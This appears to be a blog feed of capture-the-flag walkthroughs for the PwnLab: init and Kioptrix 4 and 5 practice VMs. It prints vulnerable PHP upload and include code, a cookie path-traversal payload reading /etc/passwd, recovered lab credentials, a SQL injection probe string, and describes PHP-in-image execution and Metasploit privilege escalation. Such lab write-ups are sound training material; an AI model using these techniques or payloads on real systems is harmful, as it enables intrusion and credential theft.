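Older weak-key lists are keyed by the MD5 colon form, current ssh-keygen prints the SHA256 form, so both are computed and whichever the index uses will match. The fingerprint is taken over the decoded key blob, exactly as ssh-keygen does, so it works on any authorized_keys or .pub line without decoding the key itself.<br />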
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FZYveB-QxaUBef-dqCEYenX9w8YFrzWqT-d2eln_qN-fENv9SY6LKrkoivIVdjiln8_zf93UOJNRcgytlwl49wV3vSj86RND4PKX9UCpWNrzirdv2pEDZdBWZtV5Kl-ihz_vLbRaUt0/s1600/obama.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FZYveB-QxaUBef-dqCEYenX9w8YFrzWqT-d2eln_qN-fENv9SY6LKrkoivIVdjiln8_zf93UOJNRcgytlwl49wV3vSj86RND4PKX9UCpWNrzirdv2pEDZdBWZtV5Kl-ihz_vLbRaUt0/s640/obama.png" width="640" /></a></div>
<br />
Great! So now we need a way to escalate our privileges. I found a working exploit and...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkMQZc-BAtFtTJbXQmNupGaoL0xcIAQ7aI1gBhf_pHfTwBV0KdXgGa68IeIfH-JiJBbp2yWRbA6pyM_9Ef09aAx7O1NrHOGjgnxu6rf20m5nVXX9J0aEQqn7G_w9zDiVL9pNqV6H-y_bg/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkMQZc-BAtFtTJbXQmNupGaoL0xcIAQ7aI1gBhf_pHfTwBV0KdXgGa68IeIfH-JiJBbp2yWRbA6pyM_9Ef09aAx7O1NrHOGjgnxu6rf20m5nVXX9J0aEQqn7G_w9zDiVL9pNqV6H-y_bg/s1600/root.png" /></a></div>
<br />
Game over!<br />
<br />
<b>Second attack scenario</b>.<br />
We can also get a limited shell via Samba. Read <b>/etc/samba/passdb.tdb</b>, extract the password hash stored for the <b>vmware</b> user and crack it (we get <b>h4ckm3</b>). With that password we can connect to the <b>//UBUNTUVM/home</b> share over Samba and grab the SSH public key from the home directory.<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-68690602022294558252016-08-09T15:15:00.001+02:002016-08-09T15:15:54.432+02:00PwnLab init challengeHello,<br />
<br />
"Welcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something.
The purpose of this CTF is to get root and read the flag."<br />
<br />
So, let's play with it.<br />
Nmap scanning phase:<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
<b>80/tcp open http Apache httpd 2.4.10 ((Debian))</b><br />
|_http-server-header: Apache/2.4.10 (Debian)<br />
|_http-title: PwnLab Intranet Image Hosting<br />
<b>111/tcp open rpcbind 2-4 (RPC #100000)</b><br />
| rpcinfo: <br />
| program version port/proto service<br />
| 100000 2,3,4 111/tcp rpcbind<br />
| 100000 2,3,4 111/udp rpcbind<br />
| 100024 1 40309/udp status<br />
|_ 100024 1 42225/tcp status<br />
<b>3306/tcp open mysql MySQL 5.5.47-0+deb8u1</b><br />
| mysql-info: <br />
| Protocol: 53<br />
| Version: .5.47-0+deb8u1<br />
| Thread ID: 38<br />
| Capabilities flags: 63487<br />
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsCompression, IgnoreSigpipes, InteractiveClient, ODBCClient, SupportsTransactions, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongColumnFlag<br />
| Status: Autocommit<br />
|_ Salt: BWnFSNkP0;xm:veu@|p=<br />
<b>42225/tcp open status 1 (RPC #100024)</b></blockquote>
As always, let's start with the web application.<br />
The default web page looks like some kind of administration panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKWyQDRZNLx5k0mc7LFpGGdjfeygnjAd6moBGCY4CagzvvToRyStBb-2UNLXEBabbHe1cAKVk5OjJEtXtrJnRZQ3GAPeGeir7DIqrH7ImdO2RrmGnrfJiohFetwKh_Abjvns5v3cpZDU/s1600/default.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKWyQDRZNLx5k0mc7LFpGGdjfeygnjAd6moBGCY4CagzvvToRyStBb-2UNLXEBabbHe1cAKVk5OjJEtXtrJnRZQ3GAPeGeir7DIqrH7ImdO2RrmGnrfJiohFetwKh_Abjvns5v3cpZDU/s1600/default.png" /></a></div>
<br />
We must be logged in to upload a file. Let's try playing with the <b>page</b> parameter.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdTkOEcukL3iD_Nd0YQEzO78Iw5TOS2gg1HEsIZzZGx5z7wTCDMzb2sjDo55ROWBPka_ElQDsjgTLkhlQCYbPtxNb4vkwQRw0NC8f2MLrR9ddt7Aso3sD9LleejqftNH2tW4B3fEctf2k/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdTkOEcukL3iD_Nd0YQEzO78Iw5TOS2gg1HEsIZzZGx5z7wTCDMzb2sjDo55ROWBPka_ElQDsjgTLkhlQCYbPtxNb4vkwQRw0NC8f2MLrR9ddt7Aso3sD9LleejqftNH2tW4B3fEctf2k/s640/lfi.png" width="640" /></a></div>
<br />
Great! So, let's try to read something like the <b>config.php</b> file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBUcwBt2AEZoYEfIYWShkhF09VaJr9lCIoqUyZa8ySCbObXTziKPAP4gXfYT9EQR4ONu8sVK6mm3WQGIQEvtuyb5c3Y3YGmETOad1-uBQKhzrSc8pVh0tx2cE412cR5lnomDRp_2SgCFg/s1600/config.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBUcwBt2AEZoYEfIYWShkhF09VaJr9lCIoqUyZa8ySCbObXTziKPAP4gXfYT9EQR4ONu8sVK6mm3WQGIQEvtuyb5c3Y3YGmETOad1-uBQKhzrSc8pVh0tx2cE412cR5lnomDRp_2SgCFg/s1600/config.png" /></a></div>
<br />
Excellent! We have retrieved the MySQL credentials! Let's verify them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjssPwgF9GW4De-aUudx_WxkwjoFoQJLuIp1Ny2qOmRYJKKc3oWB_51ucvIfeZwrpX4r4cZPPp3KYWwYgeR3vpaVdIQaMkiSUpJ9jtqz0L5po-xxUp5cj1avrdD-w4iYW2Q5bFYJQ7XXvI/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjssPwgF9GW4De-aUudx_WxkwjoFoQJLuIp1Ny2qOmRYJKKc3oWB_51ucvIfeZwrpX4r4cZPPp3KYWwYgeR3vpaVdIQaMkiSUpJ9jtqz0L5po-xxUp5cj1avrdD-w4iYW2Q5bFYJQ7XXvI/s1600/mysql.png" /></a></div>
<br />
Great! We have got three sets of credentials, probably for the web application.<br />
The stored passwords look like base64-encoded strings. After decoding, the valid credentials are:<br />
<b>kent:JWzXuBJJNy</b><br />
<b>mike:SIfdsTEn6I</b><br />
<b>kane:iSv5Ym2GRo</b><br />
Before logging in as one of the three users, let's examine what the <b>upload.php</b> file looks like.<br />
<blockquote class="tr_bq">
<?php<br />session_start();<br />if (!isset($_SESSION['user'])) { die('You must be log in.'); }<br />?><br /><html><br /> <body><br /> <form action='' method='post' enctype='multipart/form-data'><br /> <input type='file' name='file' id='file' /><br /> <input type='submit' name='submit' value='Upload'/><br /> </form><br /> </body><br /></html><br /><?php <br />if(isset($_POST['submit'])) {<br /> if ($_FILES['file']['error'] <= 0) {<br /> $filename = $_FILES['file']['name'];<br /> $filetype = $_FILES['file']['type'];<br /> $uploaddir = 'upload/';<br /> $file_ext = strrchr($filename, '.');<br /> $imageinfo = getimagesize($_FILES['file']['tmp_name']);<br /> $whitelist = array(".jpg",".jpeg",".gif",".png"); <br /><br /> if (!(in_array($file_ext, $whitelist))) {<br /> die('Not allowed extension, please upload images only.');<br /> }<br /><br /> if(strpos($filetype,'image') === false) {<br /> die('Error 001');<br /> }<br /><br /> if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {<br /> die('Error 002');<br /> }<br /><br /> if(substr_count($filetype, '/')>1){<br /> die('Error 003');<br /> }<br /><br /> $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;<br /><br /> if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {<br /> echo "<img src=\"".$uploadfile."\"><br />";<br /> } else {<br /> die('Error 4');<br /> }<br /> }<br />}<br /><br />?></blockquote>
OK, we can see that only the <b>.gif, .jpg, .jpeg</b> and <b>.png</b> extensions are accepted, the Content-Type must contain "image", and getimagesize() must recognise the file as an image. I tried hard to upload PHP code as a directly executable script, without success... The upload checks themselves hold up: a .php file is out, but nothing stops an image file from carrying PHP code in its body, as long as nothing on the server ever executes it.<br />
Let's examine the <b>index.php</b> file (I have no more ideas).<br />
<blockquote class="tr_bq">
<?php<br />//Multilingual. Not implemented yet.<br />//setcookie("lang","en.lang.php");<br />if (isset($_COOKIE['lang']))<br />{<br /> include("lang/".$_COOKIE['lang']);<br />}<br />// Not implemented yet.<br />?><br /><html><br /><head><br /><title>PwnLab Intranet Image Hosting</title><br /></head><br /><body><br /><center><br /><img src="images/pwnlab.png"><br /><br />[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]<br /><hr/><br/><br /><?php<br /> if (isset($_GET['page']))<br /> {<br /> include($_GET['page'].".php");<br /> }<br /> else<br /> {<br /> echo "Use this server to upload and share image files inside the intranet";<br /> }<br />?><br /></center><br /></body><br /></html></blockquote>
We can see that the <b>lang</b> cookie is passed straight into <b>include()</b>, so maybe there is an LFI here?<br />
BINGO! I replaced the PHPSESSID cookie with lang=../../../../../../../etc/passwd.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13TtCEPS-rk-qZbGFV6cK0WTN0zJSUHiaG5gnn10-S5EvGs5hWg-dcDN_OrZOeSvvOeIy8W7I4kS7YFrKJBGjEPoHJUphQXW1eT1wsDPfUgfG4xcYwj1bx-LTyihcbKngl4J-w99U28o/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13TtCEPS-rk-qZbGFV6cK0WTN0zJSUHiaG5gnn10-S5EvGs5hWg-dcDN_OrZOeSvvOeIy8W7I4kS7YFrKJBGjEPoHJUphQXW1eT1wsDPfUgfG4xcYwj1bx-LTyihcbKngl4J-w99U28o/s640/lfi.png" width="640" /></a></div>
<br />
Great! So we can upload a <b>png</b> file with PHP code embedded in it and execute it through the LFI in the lang cookie!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTpZM8YrF2TBvpl5v1MiwvFsP_fmBrY8QB2VKzImOF869hkq7uuMJsQTp4eNYLBPOw4tPu5ErS0OtUSag_sgZ2swgNE_lORQ2ylXPZjRYRt5n4MSfrw9oZ4aHHYv6MshPinecrKB9rzfU/s1600/limited.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTpZM8YrF2TBvpl5v1MiwvFsP_fmBrY8QB2VKzImOF869hkq7uuMJsQTp4eNYLBPOw4tPu5ErS0OtUSag_sgZ2swgNE_lORQ2ylXPZjRYRt5n4MSfrw9oZ4aHHYv6MshPinecrKB9rzfU/s1600/limited.png" /></a></div>
<br />
<br />Excellent! We have got a limited shell. So, let's try the retrieved credentials to raise our privileges.<br />
BINGO! We can do that!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4okvJ1aJ28SY2YtlAiTR3XMWU1JjaqRli-sZUt7v8tihA2tDWXitXTxEZsnLq6MpYMIfaUaxAWxEdv9ePuHBii9f0ftuqbqM7iBbAUBTl5QtJFKbTIh_8ZWOW6W3yAVjDa8Cl_GNXCdY/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4okvJ1aJ28SY2YtlAiTR3XMWU1JjaqRli-sZUt7v8tihA2tDWXitXTxEZsnLq6MpYMIfaUaxAWxEdv9ePuHBii9f0ftuqbqM7iBbAUBTl5QtJFKbTIh_8ZWOW6W3yAVjDa8Cl_GNXCdY/s1600/shell.png" /></a></div>
<br />
Great!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMakUcKn3eH4LnxtnuwrM8PihEbt_M-jlK9hTU-NafUha7OtUEtuTqmpzXRTRTPCcWLo6bQd6fQ_9kUCTN6Wz5y2L8dijy8yUfR7OXexjWtJRpnZImrPhITGEvHTjlstdQkOliqGlZVc/s1600/mike.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMakUcKn3eH4LnxtnuwrM8PihEbt_M-jlK9hTU-NafUha7OtUEtuTqmpzXRTRTPCcWLo6bQd6fQ_9kUCTN6Wz5y2L8dijy8yUfR7OXexjWtJRpnZImrPhITGEvHTjlstdQkOliqGlZVc/s1600/mike.png" /></a></div>
<br />
Very good. TRY HARDER!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4r3tua0Wws3dMJRQTscp8qxYx7R1JB0GBITRhYZacGvOoctv68Ya0vdtKtumSxiDczRliipK3ti1waT7nNNvWirk7uHCCHl1oyWicgdVrhDBsPNFZ4ziBvM5vyqBpzvwBd3B8ZXrDGHY/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4r3tua0Wws3dMJRQTscp8qxYx7R1JB0GBITRhYZacGvOoctv68Ya0vdtKtumSxiDczRliipK3ti1waT7nNNvWirk7uHCCHl1oyWicgdVrhDBsPNFZ4ziBvM5vyqBpzvwBd3B8ZXrDGHY/s1600/root.png" /></a></div>
<br />
Game over!rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-16387058970195151852016-07-22T14:12:00.000+02:002016-07-22T14:12:06.027+02:00Kioptrix 5Hello,<br />
Now it's the turn of the last (unfortunately) Kioptrix challenge.<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpJqkLDkiOkMI8P3zx17TpXDn7rKXCJqqIZIU-jIKArjzU9Z_Eu0gy__B-C1Nz6mJSH5ZdMp9Tw8ApbNVDX3QElz9_EGZsvRVeR8UxmyjPmIPV0_B1JwGShCRrmvYzx3Yj-56e3hS5Tuw/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpJqkLDkiOkMI8P3zx17TpXDn7rKXCJqqIZIU-jIKArjzU9Z_Eu0gy__B-C1Nz6mJSH5ZdMp9Tw8ApbNVDX3QElz9_EGZsvRVeR8UxmyjPmIPV0_B1JwGShCRrmvYzx3Yj-56e3hS5Tuw/s1600/nmap.png" /></a></div>
<br />
<br />Only two open ports? That suits me.<br />
Let's begin our journey with port 80. The web page is the default Apache <b>It works</b> page, but its source code contains good news for us.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_jzyg0na5EHhPK4NlFD4j0xNvgUWT8dVcngcZuiYVLnoYtHfe1_dsGnhyrfyy0s7LGnrrXu9X6ljX3oc-Ok1XG4cJVFHDYSj0dH_ljIxXHF00poeF0eMGGBLhxwGIWsEIpC4QneSzJA/s1600/source.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_jzyg0na5EHhPK4NlFD4j0xNvgUWT8dVcngcZuiYVLnoYtHfe1_dsGnhyrfyy0s7LGnrrXu9X6ljX3oc-Ok1XG4cJVFHDYSj0dH_ljIxXHF00poeF0eMGGBLhxwGIWsEIpC4QneSzJA/s1600/source.png" /></a></div>
<br />
Wow, there is pChart, which is good for us because it has multiple known vulnerabilities.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5tYEoPfWbU9kverHRkM0TD6fhvxGY5NOjmJkOsGuxFbNvXjekpyPPQ8uhmAViVcetZhzBOPx5BoIVZHRApVTqz19oFkpEeCTqH45_VTlUSlcVY6rFJ7MbhVdfY0gLH3W239sTHM7ql40/s1600/pchart.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5tYEoPfWbU9kverHRkM0TD6fhvxGY5NOjmJkOsGuxFbNvXjekpyPPQ8uhmAViVcetZhzBOPx5BoIVZHRApVTqz19oFkpEeCTqH45_VTlUSlcVY6rFJ7MbhVdfY0gLH3W239sTHM7ql40/s1600/pchart.png" /></a></div>
<br />
OK, let's try to exploit the directory traversal vulnerability.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZM70VGSQOyAHdaLDoTa03In4kK8ipXnxFfBsuALaX_kjbQRfoQR_T6ww2nFkheE1cTZvW-VFGvJ9hOExKPLyg2hazzSkD3f0J9hVDVL5Fs3_SaqY0_l-fMT0o9i_3cSkaCDTKLiFbuc/s1600/passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZM70VGSQOyAHdaLDoTa03In4kK8ipXnxFfBsuALaX_kjbQRfoQR_T6ww2nFkheE1cTZvW-VFGvJ9hOExKPLyg2hazzSkD3f0J9hVDVL5Fs3_SaqY0_l-fMT0o9i_3cSkaCDTKLiFbuc/s1600/passwd.png" /></a></div>
<br />
Excellent! Let's try to find the Apache configuration file with the DocumentRoot.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Y_uQab-WVJRNgMuMizJmBIrGWjYR9jlmJbTIubrRALseW0hYwo4e_C0hsLDSIVm4T0NS9ghgBBYRS4D1gpu89PXUgQ9oFl3VXEqYYpUl8b1Qf5N7epfvYi1Ht7mX0E5JaoIAO_MLMmk/s1600/conf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="623" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Y_uQab-WVJRNgMuMizJmBIrGWjYR9jlmJbTIubrRALseW0hYwo4e_C0hsLDSIVm4T0NS9ghgBBYRS4D1gpu89PXUgQ9oFl3VXEqYYpUl8b1Qf5N7epfvYi1Ht7mX0E5JaoIAO_MLMmk/s640/conf.png" width="640" /></a></div>
<br />
What do you think about it? Access to port 8080 is gated on the User-Agent header, a value the client chooses, so I changed the User-Agent in Burp Suite and got this on port 8080:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcfMA46hXOuVs-6IhzLIRg1MCnEO0S7qtTpMFNVvPrELUVx34kvCGRtLcNS6EeuZsNbFlDxPq-p_scAXELrMrc8sOzq7T-eeuC-K7lV3LLBjU9nAsyos04gkrZQNdZXLzUnsX6xvusK8/s1600/forbid.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcfMA46hXOuVs-6IhzLIRg1MCnEO0S7qtTpMFNVvPrELUVx34kvCGRtLcNS6EeuZsNbFlDxPq-p_scAXELrMrc8sOzq7T-eeuC-K7lV3LLBjU9nAsyos04gkrZQNdZXLzUnsX6xvusK8/s1600/forbid.png" /></a></div>
<br />
I clicked on it:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1be2wIehoP3kXwLdJ4aEOJDnmWWSWO4D_WhNi0HyNR2BZKC8c8uIQz-jXcQrC1qeaUpsxTWYCBfVRYi5ntJ-d31OMrJgnqMwxKVRYJnWEAtW6x4zOH5Ryd0g-rPAVyYgh4VqePM__U4/s1600/tax.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="605" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1be2wIehoP3kXwLdJ4aEOJDnmWWSWO4D_WhNi0HyNR2BZKC8c8uIQz-jXcQrC1qeaUpsxTWYCBfVRYi5ntJ-d31OMrJgnqMwxKVRYJnWEAtW6x4zOH5Ryd0g-rPAVyYgh4VqePM__U4/s640/tax.png" width="640" /></a></div>
<br />
Hmmm, at first I didn't know how to exploit it... but after a quick search it turns out the application has a remote code execution vulnerability!<br />
I used the Metasploit Framework module for it and got a limited shell!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnvsKO6FAQfmsL6BejQkJrplP3nb-7PYaZPOl3ncnqwCPewUzbrPt7a4_TILx1dx7CuNekR4-hdFM3s_9VzTqgwq8yVHNt01SkwSVBmppvB-r2UoGjmrYXyf6hbGL1sLpFaSQsts8BIAA/s1600/Screenshot+from+2016-07-22+08-05-23.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnvsKO6FAQfmsL6BejQkJrplP3nb-7PYaZPOl3ncnqwCPewUzbrPt7a4_TILx1dx7CuNekR4-hdFM3s_9VzTqgwq8yVHNt01SkwSVBmppvB-r2UoGjmrYXyf6hbGL1sLpFaSQsts8BIAA/s640/Screenshot+from+2016-07-22+08-05-23.png" width="640" /></a></div>
<br />
So, now it's time to escalate our privileges.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcx63388VqPVMPuz7Hk-wVkt0NhpifuTLiL6yi9Ygw5wbgIPShsf_biXdQuUMQZXVRzvJxaQ5Cd8HeaIRP0xGEMrIPZ8If27NhYhaRTtgxGIyThR6K1PHJVWBs8jnCKrNvViYqahzl_U/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDcx63388VqPVMPuz7Hk-wVkt0NhpifuTLiL6yi9Ygw5wbgIPShsf_biXdQuUMQZXVRzvJxaQ5Cd8HeaIRP0xGEMrIPZ8If27NhYhaRTtgxGIyThR6K1PHJVWBs8jnCKrNvViYqahzl_U/s1600/root.png" /></a></div>
<br />
Game over! <br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-89006012682075169072016-07-22T10:03:00.003+02:002016-07-22T10:29:55.124+02:00Kioptrix 4Hello,<br />
We know the Kioptrix challenges (one of my favourites), don't we? We solved the first three, so now it is the turn of the fourth.<br />
<br />
Scanning without aggressive mode :)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0oi-5lm9LmVNlQ7gdFLIfHLGlh5_N5F0YpGgSxQ-nZKDUnE49NIMwAq7cgqcSos-dXbvS5W-GKodPSVh9EKvuf6VOPXLIEGg98ur3lXmNvJUJUBAoxBNDCQy0dbgd3sZkyZd7Vf5Nd1U/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0oi-5lm9LmVNlQ7gdFLIfHLGlh5_N5F0YpGgSxQ-nZKDUnE49NIMwAq7cgqcSos-dXbvS5W-GKodPSVh9EKvuf6VOPXLIEGg98ur3lXmNvJUJUBAoxBNDCQy0dbgd3sZkyZd7Vf5Nd1U/s1600/nmap.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, four open ports. Let's start with the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9X45JIBemLY4wCcLt8FPD5Pqo3B2y_e2_mHIpbeoeP7_b3Nvb5aZdytRv46WOVeZR2iHcavX51SwPhIVPxS-N7b-NF0extwvh_UQ6dq-nEuq2TbgPOuSrostqm6zAzscUXpN75aa8Cco/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9X45JIBemLY4wCcLt8FPD5Pqo3B2y_e2_mHIpbeoeP7_b3Nvb5aZdytRv46WOVeZR2iHcavX51SwPhIVPxS-N7b-NF0extwvh_UQ6dq-nEuq2TbgPOuSrostqm6zAzscUXpN75aa8Cco/s1600/web.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice, maybe this is an opportunity to try a SQL injection attack? Indeed, there is a SQLi vulnerability.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zNfMAJcKCboCV7LlQPDViKwwpRS4QtWArcCyK4-R2zOqHki8HeH0AhIgGigJOY6rNAQWfOmISjP8VHx5-4RJ14C7Ij_KwHWIQbJ991Wdsfs45wbS37PPyVqWN1liuBEoAExuYrha_rY/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zNfMAJcKCboCV7LlQPDViKwwpRS4QtWArcCyK4-R2zOqHki8HeH0AhIgGigJOY6rNAQWfOmISjP8VHx5-4RJ14C7Ij_KwHWIQbJ991Wdsfs45wbS37PPyVqWN1liuBEoAExuYrha_rY/s1600/user.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
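Since the login form's SQL injection is the foothold in this post, here is an added example (mine, not code from the Kioptrix 4 VM or this write-up) that shows the class of query which produces the flaw next to its parameterised form, run against an in-memory SQLite table. The table name, column names, rows and passwords are constructed for the example.<br />

```python
# Added example: a login check built by string concatenation beside the
# parameterised version. The table, columns and rows are constructed;
# passwords are stored in clear only to keep the example short.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO members (username, password) VALUES (?, ?)",
        [("john", "constructed-password-1"), ("robert", "constructed-password-2")],
    )
    return db


def login_vulnerable(db, username, password):
    # The statement is assembled from raw input, so a quote in the input
    # changes the statement's structure. This is the "before" of the fix and
    # mirrors the class of flaw the write-up exploits.
    query = (
        "SELECT username FROM members WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    # Placeholders keep the statement fixed; the inputs travel as values only,
    # so a quote or comment marker in them is just data that matches no row.
    row = db.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # A username containing a quote and a SQL comment marker: against the
    # concatenated query it comments out the password check.
    probe = "john' --"
    print("vulnerable:", login_vulnerable(db, probe, "wrong"))
    print("safe:      ", login_safe(db, probe, "wrong"))
```

The same placeholder discipline applies to the PHP the VM runs (prepared statements in mysqli or PDO); concatenating `$_POST` values into the query string is what makes a login form behave like the one in the screenshot.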
We could use sqlmap, but let's continue manually. I ran dirb.<br />
